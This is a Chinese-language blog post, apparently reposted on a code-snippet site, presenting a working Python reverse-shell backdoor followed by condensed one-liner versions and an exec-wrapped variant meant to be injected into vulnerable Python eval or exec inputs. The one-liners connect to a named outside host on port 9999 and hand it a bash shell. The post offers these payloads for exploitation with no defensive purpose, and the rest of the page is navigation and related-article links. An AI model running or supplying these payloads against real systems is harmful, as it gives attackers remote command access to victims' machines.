首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

在漏洞利用Python代码真的很爽

Posted in Python onAugust 26, 2007

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006\n"
  print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------\n")
  s.send("----------------------------- By wofeiwo -----------------------------\n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';

注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

在漏洞利用Python代码真的很爽

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
理解Python中函数的参数
Apr 27 Python
python 计算数组中每个数字出现多少次--“Bucket”桶的思想
Dec 19 Python
python+POP3实现批量下载邮件附件
Jun 19 Python
Python2与Python3的区别实例分析
Apr 11 Python
python多进程下实现日志记录按时间分割
Jul 22 Python
python操作excel让工作自动化
Aug 09 Python
Python的几种主动结束程序方式
Nov 22 Python
python django中8000端口被占用的解决
Dec 17 Python
详解如何在pyqt中通过OpenCV实现对窗口的透视变换
Sep 20 Python
matplotlib 三维图表绘制方法简介
Sep 20 Python
python实现图像高斯金字塔的示例代码
Dec 11 Python
python使用pygame创建精灵Sprite
Apr 06 Python
python编程-将Python程序转化为可执行程序[整理]
Apr 09 #Python
python的几种开发工具介绍
Mar 07 #Python
王纯业的Python学习笔记 下载
Feb 10 #Python
一篇不错的Python入门教程
Feb 08 #Python
Python学习资料
Feb 08 #Python
Python完全新手教程
Feb 08 #Python
简明 Python 基础学习教程
Feb 08 #Python
Keras(3) character(1) data(4) 神经网络(7) 数据表(1) mysql(6) 三子棋(2) 字符集(1) name_scope (1) variable_scope(1)
You might like
用PHP与XML联手进行网站编程代码实例
2008/07/10 PHP
使用php统计字符串中中英文字符的个数
2013/06/23 PHP
php selectradio和checkbox默认选择的实现方法详解
2013/06/29 PHP
Fedora下安装php Redis扩展笔记
2014/09/03 PHP
PHP的Yii框架使用中的一些错误解决方法与建议
2015/08/21 PHP
PHP生成条形码大揭秘
2015/09/24 PHP
Nginx下ThinkPHP5的配置方法详解
2017/08/01 PHP
PHP实现的多进程控制demo示例
2019/07/22 PHP
Javascript跨域请求的4种解决方式
2013/03/17 Javascript
artdialog的图片/标题以及关闭按钮不显示的解决方法
2013/06/27 Javascript
jQuery截取指定长度字符串代码
2014/08/21 Javascript
JS延时提示框实现方法详解
2015/11/26 Javascript
JQuery EasyUI Layout 在from布局自适应窗口大小的实现方法
2016/05/28 Javascript
JavaScript 轮播图和自定义滚动条配合鼠标滚轮分享代码贴
2016/10/28 Javascript
JS+HTML5 FileReader对象用法示例
2017/04/07 Javascript
javascript按顺序加载运行js方法
2017/12/01 Javascript
一步快速解决微信小程序中textarea层级太高遮挡其他组件
2019/03/04 Javascript
Webpack4+Babel7+ES6兼容IE8的实现
2019/04/10 Javascript
解决ie11 SCRIPT5011:不能执行已释放Script的代码问题
2019/05/05 Javascript
初试vue-cli使用HBuilderx打包app的坑
2019/07/17 Javascript
vue与iframe之间的信息交互的实现
2020/04/08 Javascript
JS脚本实现定时到网站上签到/签退功能
2020/04/22 Javascript
wxpython 最小化到托盘与欢迎图片的实现方法
2014/06/09 Python
Python各类图像库的图片读写方式总结(推荐)
2018/02/23 Python
让你Python到很爽的加速递归函数的装饰器
2019/05/26 Python
Python 3.8 新功能全解
2019/07/25 Python
使用anaconda安装pytorch的实现步骤
2020/09/03 Python
Pytorch1.5.1版本安装的方法步骤
2020/12/31 Python
使paramiko库执行命令时在给定的时间强制退出功能的实现
2021/03/03 Python
夏威夷灵感服装及配饰:Reyn Spooner
2018/09/18 全球购物
程序集与命名空间有什么不同
2014/07/25 面试题
学校节能减排倡议书
2014/05/16 职场文书
大学生党员自我剖析材料
2014/10/06 职场文书
六年级小学生评语
2014/12/26 职场文书
篮球拉拉队口号
2015/12/25 职场文书
如何书写授权委托书?
2019/06/25 职场文书